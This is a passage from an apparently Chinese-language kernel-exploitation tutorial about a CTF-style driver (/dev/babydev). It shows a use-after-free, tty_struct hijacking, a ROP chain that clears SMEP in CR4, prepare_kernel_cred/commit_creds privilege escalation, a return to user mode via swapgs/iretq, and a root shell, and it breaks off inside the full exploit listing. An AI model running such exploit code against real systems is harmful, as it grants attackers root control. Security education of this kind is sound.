class="comment">// length</span></span><br><span class="line">    PROT_READ | PROT_WRITE,                     <span class="comment">// prot</span></span><br><span class="line">    MAP_PRIVATE | MAP_ANONYMOUS,                <span class="comment">// flags</span></span><br><span class="line">    <span class="number">-1</span>,                                         <span class="comment">// fd</span></span><br><span class="line">    <span class="number">0</span>)                                          <span class="comment">// offset</span></span><br><span class="line">    ) == MAP_FAILED)  </span><br><span class="line">    <span class="built_in">perror</span>(<span class="string">&quot;mmap&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 调试时先装载页面</span></span><br><span class="line">fake_stack[<span class="number">0</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[+]     fake_stack addr: %p\n&quot;</span>, fake_stack);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 读取 tty_struct 结构体的所有数据</span></span><br><span class="line"><span class="type">int</span> ops_ptr_offset = <span class="number">4</span> + <span class="number">4</span> + <span class="number">8</span> + <span class="number">8</span>;</span><br><span class="line"><span class="type">char</span> overwrite_mem[ops_ptr_offset + <span class="number">8</span>];</span><br><span class="line"><span class="type">char</span>** ops_ptr_addr = (<span class="type">char</span>**)(overwrite_mem + ops_ptr_offset);</span><br><span class="line"></span><br><span class="line"><span class="built_in">read</span>(fd2, overwrite_mem, <span class="built_in">sizeof</span>(overwrite_mem));</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[+] origin ops ptr addr: %p\n&quot;</span>, *ops_ptr_addr);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 修改并覆写 tty_struct 结构体</span></span><br><span class="line">*ops_ptr_addr = (<span class="type">char</span>*)fake_tty_ops;</span><br><span class="line"><span class="built_in">write</span>(fd2, overwrite_mem, <span class="built_in">sizeof</span>(overwrite_mem));</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[+] hacked ops ptr addr: %p\n&quot;</span>, *ops_ptr_addr);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 触发 tty_write</span></span><br><span class="line"><span class="comment">// 注意使用 write 时， buf 指针必须有效，否则会提前返回 EFAULT</span></span><br><span class="line"><span class="type">int</span> buf[] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line"><span class="built_in">write</span>(master_fd, buf, <span class="number">8</span>);</span><br></pre></td></tr></table></figure><p>可以看到栈指针已经成功被劫持到用户空间中：</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211013163918810.png" alt="image-20211013163918810"></p><h6 id="4-2-关闭-SMEP-ret2usr提权">4.2) 关闭 SMEP + ret2usr提权</h6><p>劫持栈指针后，我们现在可以尝试提权。正常来说，在<strong>内核</strong>里需要执行以下代码来进行提权：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">cred</span> * root_cred = <span class="built_in">prepare_kernel_cred</span>(<span class="literal">NULL</span>);</span><br><span class="line"><span class="built_in">commit_creds</span>(root_cred);</span><br></pre></td></tr></table></figure><p>其中，<code>prepare_kernel_cred</code>函数用于获取传入 <code>task_struct</code> 结构指针的 cred 结构。需要注意的是，如果传入的指针是 <strong>NULL</strong>，则<strong>函数返回的 cred 结构将是 init_cred，其中uid、gid等等均为 root 级别</strong>。</p><p><code>commit_creds</code>函数用于将当前进程的 <code>cred</code> 更新为新传入的 <code>cred</code> 结构，如果我们将当前进程的 cred 更新为 root 等级的 cred，则达到我们提权的目的。</p><p>为了利用简便，我们可以先关闭 SMEP，跳转进用户代码中直接执行预编译好的提权指令。</p><p>SMEP 标志在寄存器 CR4 上，因此我们可以通过重设 CR4 寄存器来关闭 SMEP，最后提权：</p><p><img src="/2021/10/kernel_pwn_introduction/c76896800a175ad42f2bcdd31c5c083f.png" alt="image"></p><p>我们先看一下当前的 cr4 寄存器的值</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211013172645328.png" alt="image-20211013172645328"></p><p>之后只要将 cr4 覆盖为 0x6f0 即可。</p><p>相关实现如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">set_root_cred</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="type">void</span>* (*prepare_kernel_cred)(<span class="type">void</span>*) = (<span class="type">void</span>* (*)(<span class="type">void</span>*))prepare_kernel_cred_addr;</span><br><span class="line">    <span class="built_in">void</span> (*commit_creds)(<span class="type">void</span>*) = (<span class="built_in">void</span> (*)(<span class="type">void</span>*))commit_creds_addr;</span><br><span class="line"></span><br><span class="line">    <span class="type">void</span> * root_cred = <span class="built_in">prepare_kernel_cred</span>(<span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">commit_creds</span>(root_cred);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// 准备 ROP</span></span><br><span class="line">    <span class="type">u_int64_t</span>* hijacked_stack_ptr = (<span class="type">u_int64_t</span>*)hijacked_stack_addr;</span><br><span class="line">    hijacked_stack_ptr[<span class="number">0</span>] = pop_rdi_addr;              <span class="comment">// pop rdi; ret</span></span><br><span class="line">    hijacked_stack_ptr[<span class="number">1</span>] = <span class="number">0x6f0</span>;                     <span class="comment">// new cr4</span></span><br><span class="line">    hijacked_stack_ptr[<span class="number">2</span>] = mov_cr4_rdi_pop_rbp_addr;  <span class="comment">// mov cr4, rdi; pop rbp; ret;</span></span><br><span class="line">    hijacked_stack_ptr[<span class="number">3</span>] = <span class="number">0</span>;                         <span class="comment">// dummy</span></span><br><span class="line">    hijacked_stack_ptr[<span class="number">4</span>] = (<span class="type">u_int64_t</span>)set_root_cred;  <span class="comment">// set root</span></span><br><span class="line">    <span class="comment">// todo ROP</span></span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h6 id="4-3-返回用户态-get-shell">4.3) 返回用户态 + get shell</h6><blockquote><p>当我们提权了当前进程后，剩下要做的事情就是<strong>返回至用户态</strong>并启动新shell。</p><p>可能有小伙伴会问，既然都劫持了内核控制流了，那是不是可以直接启动 shell ？为什么还要返回至用户态？</p><p>个人的理解是，劫持内核控制流后，由于改变了内核的正常运行逻辑，因此此时内核鲁棒性降低，稍微敏感的一些操作都有可能会导致内核挂掉。最稳妥的方式是回到更加稳定的用户态中，而且 root 权限的用户态程序同样可以做到内核权限所能做到的事情。</p><p>除了上面所说的以外，还有一个很重要的原因是：一般情况下在用户空间构造特定目的的代码要比在内核空间简单得多。</p></blockquote><p>如何从内核态返回至用户态中？我们可以从 syscall 的入口代码入手，先看看这部分代码：</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">ENTRY(entry_SYSCALL_64)</span><br><span class="line">  SWAPGS_UNSAFE_STACK</span><br><span class="line"><span class="meta">GLOBAL</span>(entry_SYSCALL_64_after_swapgs)</span><br><span class="line">  <span class="keyword">movq</span>  %rsp, PER_CPU_VAR(rsp_scratch)</span><br><span class="line">  <span class="keyword">movq</span>  PER_CPU_VAR(cpu_current_top_of_stack), %rsp</span><br><span class="line"></span><br><span class="line">  /* Construct struct pt_regs on stack */</span><br><span class="line">  pushq  $__USER_DS      /* pt_regs-&gt;<span class="built_in">ss</span> */</span><br><span class="line">  pushq  PER_CPU_VAR(rsp_scratch)  /* pt_regs-&gt;<span class="built_in">sp</span> */</span><br><span class="line"></span><br><span class="line">  ENABLE_INTERRUPTS(CLBR_NONE)</span><br><span class="line">  pushq  %r11        /* pt_regs-&gt;flags */</span><br><span class="line">  pushq  $__USER_CS      /* pt_regs-&gt;<span class="built_in">cs</span> */</span><br><span class="line">  pushq  %rcx        /* pt_regs-&gt;<span class="built_in">ip</span> */</span><br><span class="line">  pushq  %rax        /* pt_regs-&gt;orig_ax */</span><br><span class="line">  pushq  %rdi        /* pt_regs-&gt;<span class="built_in">di</span> */</span><br><span class="line">  pushq  %rsi        /* pt_regs-&gt;<span class="built_in">si</span> */</span><br><span class="line">  pushq  %rdx        /* pt_regs-&gt;<span class="built_in">dx</span> */</span><br><span class="line">  pushq  %rcx        /* pt_regs-&gt;<span class="built_in">cx</span> */</span><br><span class="line">  pushq  $-ENOSYS      /* pt_regs-&gt;<span class="built_in">ax</span> */</span><br><span class="line">  pushq  %r8        /* pt_regs-&gt;<span class="built_in">r8</span> */</span><br><span class="line">  pushq  %r9        /* pt_regs-&gt;<span class="built_in">r9</span> */</span><br><span class="line">  pushq  %r10        /* pt_regs-&gt;<span class="built_in">r10</span> */</span><br><span class="line">  pushq  %r11        /* pt_regs-&gt;<span class="built_in">r11</span> */</span><br><span class="line">  <span class="keyword">sub</span>  $(<span class="number">6</span>*<span class="number">8</span>), %rsp      /* pt_regs-&gt;<span class="built_in">bp</span>, <span class="built_in">bx</span>, <span class="built_in">r12</span>-<span class="number">15</span> <span class="keyword">not</span> saved */</span><br></pre></td></tr></table></figure><p>可以看到，控制流以进入入口点后，并立即执行<code>swapgs</code>指令，将当前 GS 寄存器切换成 kernel GS，之后切换栈指针至内核栈，并在内核栈中构造结构体 <code>pt_regs</code>。</p><p>该结构体声明如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">pt_regs</span> &#123;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * C ABI says these regs are callee-preserved. They aren&#x27;t saved on kernel entry</span></span><br><span class="line"><span class="comment"> * unless syscall needs a complete, fully filled &quot;struct pt_regs&quot;.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r15;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r14;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r13;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r12;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rbp;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rbx;</span><br><span class="line"><span class="comment">/* These regs are callee-clobbered. Always saved on kernel entry. */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r11;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r10;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r9;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r8;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rax;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rcx;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rdx;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rsi;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rdi;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * On syscall entry, this is syscall#. On CPU exception, this is error code.</span></span><br><span class="line"><span class="comment"> * On hw interrupt, it&#x27;s IRQ number:</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> orig_rax;</span><br><span class="line"><span class="comment">/* Return frame for iretq */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rip;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> cs;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> eflags;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rsp;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> ss;</span><br><span class="line"><span class="comment">/* top of stack page */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>结合动态调试可以发现，在控制流到达 syscall 入口点之前，<code>pt_regs</code>结构体中的 <code>rip</code>、<code>cs</code>、<code>eflags</code>、<code>rsp</code> 以及 <code>ss</code> 五个寄存器均已压栈。</p><p>我们还可以在该文件中找到下面的代码片段</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">opportunistic_sysret_failed:</span></span><br><span class="line">  <span class="keyword">SWAPGS</span></span><br><span class="line">  <span class="keyword">jmp</span>  restore_c_regs_and_iret</span><br><span class="line">  </span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">/*</span><br><span class="line"> * <span class="meta">At</span> this label, code paths which return to kernel <span class="keyword">and</span> to user,</span><br><span class="line"> * which come from interrupts/exception <span class="keyword">and</span> from syscalls, merge.</span><br><span class="line"> */</span><br><span class="line"><span class="meta">GLOBAL</span>(restore_regs_and_iret)</span><br><span class="line">  RESTORE_EXTRA_REGS</span><br><span class="line"><span class="symbol">restore_c_regs_and_iret:</span></span><br><span class="line">  RESTORE_C_REGS</span><br><span class="line">  REMOVE_PT_GPREGS_FROM_STACK <span class="number">8</span></span><br><span class="line">  INTERRUPT_RETURN</span><br></pre></td></tr></table></figure><p>根据上面的分析信息，我们不难推断出，若想从内核态返回至用户态，则需要依次完成以下两件事情：</p><ul><li>再执行一次 swapgs 指令，将当前的 GS 寄存器从 kernel gs 换回 user gs</li><li>手动在栈上构造 iret 指令所需要的5个寄存器值，然后调用 iret 指令。</li></ul><p>因此最终实现的部分代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">get_shell</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] got shell, welcome %s\n&quot;</span>, (<span class="built_in">getuid</span>() ? <span class="string">&quot;user&quot;</span> : <span class="string">&quot;root&quot;</span>));</span><br><span class="line">    <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> <span class="type">long</span> user_cs, user_eflags, user_rsp, user_ss;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">save_iret_data</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%cs, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_cs));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;pushf&quot;</span>);</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;pop %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_eflags));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%rsp, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_rsp));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%ss, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_ss));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">save_iret_data</span>();</span><br><span class="line">    <span class="built_in">printf</span>(</span><br><span class="line">        <span class="string">&quot;[+] iret data saved.\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_cs: %ld\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_eflags: %ld\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_rsp: %p\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_ss: %ld\n&quot;</span>,</span><br><span class="line">        user_cs, user_eflags, (<span class="type">char</span>*)user_rsp, user_ss</span><br><span class="line">    );</span><br><span class="line">    [...]</span><br><span class="line">    <span class="type">u_int64_t</span>* hijacked_stack_ptr = (<span class="type">u_int64_t</span>*)hijacked_stack_addr;</span><br><span class="line">    <span class="type">int</span> idx = <span class="number">0</span>;</span><br><span class="line">    hijacked_stack_ptr[idx++] = pop_rdi_addr;              <span class="comment">// pop rdi; ret</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = <span class="number">0x6f0</span>;</span><br><span class="line">    hijacked_stack_ptr[idx++] = mov_cr4_rdi_pop_rbp_addr;  <span class="comment">// mov cr4, rdi; pop rbp; ret;</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = <span class="number">0</span>;                         <span class="comment">// dummy</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = (<span class="type">u_int64_t</span>)set_root_cred;</span><br><span class="line">    <span class="comment">// 新添加的 ROP 链</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = swapgs_pop_rbp_addr;</span><br><span class="line">    hijacked_stack_ptr[idx++] = <span class="number">0</span>;                          <span class="comment">// dummy</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = iretq_addr;</span><br><span class="line">    hijacked_stack_ptr[idx++] = (<span class="type">u_int64_t</span>)get_shell;       <span class="comment">// iret_data.rip</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = user_cs;</span><br><span class="line">    hijacked_stack_ptr[idx++] = user_eflags;</span><br><span class="line">    hijacked_stack_ptr[idx++] = user_rsp;</span><br><span class="line">    hijacked_stack_ptr[idx++] = user_ss;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h6 id="4-4-ROP-注意点">4.4) ROP 注意点</h6><p>在往常的用户层面的利用，我们无需关注<strong>缺页错误</strong>这样的一个无关紧要的异常。然而在内核利用中，缺页错误往往非常致命（不管是否是可恢复的，即正常的缺页错误也很致命），大概率会直接引发 <strong>double fault</strong>，致使内核重启：</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211013173842187.png" alt="image-20211013173842187"></p><p>因此在构造 ROP 链时，应尽量避免在内核中直接引用那些<strong>尚未装载页面的内存页</strong>。</p><p>再一个问题是单步调试。在调试内核 ROP 链时，有概率会在单步执行时直接跑炸内核，但先给该位置下断点后，再跑至该位置则执行正常。这个调试…仁者见仁智者见智吧（滑稽）</p><h6 id="4-5-完整-exploit">4.5) 完整 exploit</h6><p>完整的 exploit 如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> xchg_eax_esp_addr           0xffffffff8100008a</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> prepare_kernel_cred_addr    0xffffffff810a1810</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> commit_creds_addr           0xffffffff810a1420</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> pop_rdi_addr                0xffffffff810d238d</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> mov_cr4_rdi_pop_rbp_addr    0xffffffff81004d80</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> swapgs_pop_rbp_addr         0xffffffff81063694          </span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> iretq_addr                  0xffffffff814e35ef</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">set_root_cred</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="type">void</span>* (*prepare_kernel_cred)(<span class="type">void</span>*) = (<span class="type">void</span>* (*)(<span class="type">void</span>*))prepare_kernel_cred_addr;</span><br><span class="line">    <span class="built_in">void</span> (*commit_creds)(<span class="type">void</span>*) = (<span class="built_in">void</span> (*)(<span class="type">void</span>*))commit_creds_addr;</span><br><span class="line"></span><br><span class="line">    <span class="type">void</span> * root_cred = <span class="built_in">prepare_kernel_cred</span>(<span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">commit_creds</span>(root_cred);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">get_shell</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] got shell, welcome %s\n&quot;</span>, (<span class="built_in">getuid</span>() ? <span class="string">&quot;user&quot;</span> : <span class="string">&quot;root&quot;</span>));</span><br><span class="line">    <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> <span class="type">long</span> user_cs, user_eflags, user_rsp, user_ss;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">save_iret_data</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%cs, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_cs));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;pushf&quot;</span>);</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;pop %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_eflags));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%rsp, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_rsp));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%ss, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_ss));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">save_iret_data</span>();</span><br><span class="line">    <span class="built_in">printf</span>(</span><br><span class="line">        <span class="string">&quot;[+] iret data saved.\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_cs: %ld\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_eflags: %ld\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_rsp: %p\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_ss: %ld\n&quot;</span>,</span><br><span class="line">        user_cs, user_eflags, (<span class="type">char</span>*)user_rsp, user_ss</span><br><span class="line">    );</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> fd1 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR);</span><br><span class="line">    <span class="type">int</span> fd2 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR);</span><br><span class="line">    <span class="built_in">ioctl</span>(fd1, <span class="number">65537</span>, <span class="number">0x2e0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">close</span>(fd1);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 申请 tty_struct</span></span><br><span class="line">    <span class="type">int</span> master_fd = <span class="built_in">open</span>(<span class="string">&quot;/dev/ptmx&quot;</span>, O_RDWR);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 构造一个 fake tty_operators</span></span><br><span class="line">    <span class="type">u_int64_t</span> fake_tty_ops[] = &#123;</span><br><span class="line">        <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>,</span><br><span class="line">        xchg_eax_esp_addr, <span class="comment">// int  (*write)(struct tty_struct*, const unsigned char *, int)</span></span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] fake_tty_ops constructed\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span 